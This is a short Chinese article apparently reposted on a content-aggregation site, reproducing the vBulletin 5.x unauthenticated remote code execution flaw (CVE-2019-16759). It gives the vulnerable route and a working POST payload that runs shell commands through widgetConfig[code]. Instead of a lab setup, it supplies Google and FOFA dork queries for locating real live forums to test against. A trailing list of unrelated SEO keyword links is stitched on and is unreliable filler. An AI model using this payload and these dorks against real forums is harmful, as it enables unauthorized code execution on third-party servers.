vBulletin 5.x未授权RCE漏洞CVE-2019-16759复现分析
发表于:2025-01-31 作者:千家信息网编辑
千家信息网最后更新 2025年01月31日,vBulletin 5.x未授权RCE漏洞CVE-2019-16759复现分析,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。0x00
千家信息网最后更新 2025年01月31日vBulletin 5.x未授权RCE漏洞CVE-2019-16759复现分析
vBulletin 5.x未授权RCE漏洞CVE-2019-16759复现分析,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。
0x00 简介
vBulletin是一个收费低廉但强大的建站BBS(论坛)CMS,该CMS国外大量论坛使用,中国国内少许网站使用。近日,vBulletin 5.x爆出一个前台远程代码执行漏洞,无需登录即可触发。该论坛程序在国外的国外的用户量就类似dz论坛在国内的用户量。
0x01 漏洞概述
漏洞通过请求ajax/render/widget_php进行模板注入触发代码执行。
0x02 影响范围
5.0.0 <= vBulletin <=5.5.4
0x03 环境搭建
自行搭建需要付费,因此这里使用google语法和FOFA查找
google语法:
site:*.vbulletin.net
Powered by vBulletin
FOFA:
content="vBulletin"
app="vBulletin"
在线靶场获取方式
转发本文至朋友圈并截图发至公众号内即可
0x04 漏洞利用
进入如下vBulletin论坛
访问/index.php?routestring=ajax/render/widget_php会显示以下结果
然后POST如下数据即可执行命令whoami
widgetConfig[code] = echo shell_exec('whoami'); exit;
0x05 修复方式
安全更新补丁下载:
http://members.vbulletin.com/patches.php
关于vBulletin 5.x未授权RCE漏洞CVE-2019-16759复现分析问题的解答就分享到这里了,希望以上内容可以对大家有一定的帮助,如果你还有很多疑惑没有解开,可以关注行业资讯频道了解更多相关知识。
漏洞
论坛
分析
问题
代码
方式
更多
用户
用户量
语法
帮助
解答
低廉
强大
易行
安全
简单易行
公众
内容
前台
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
java8 数据库
恒昌网络技术
软件开发外包项目网
济南软件开发的
酒店无线网络安全研究
产业创新网络安全
2003国家网络安全战略
海淀区正规软件开发范围
服务器安全指什么
软件开发公司用的什么语言
互联网科技类公众号
学校ftp服务器
浏览器代理服务器安全吗
天津微商系统软件开发
网络技术挑战范文
超密集异构网络技术关键技术
网络安全与反诈总结
电脑连接数据库出现的问题
鲍永能网络安全讲话
以下什么属于数据库系统
联想服务器拆
新疆公安机关网络安全管理
电信企业服务器都干啥用
怎么配置dhcp服务器
数据库原理与技术考试开卷
网络安全教育视频拍摄
广州服务软件开发设计
计算机网络技术专业对应的企业
北京嵌入式软件开发要多少钱
网络安全公司研究院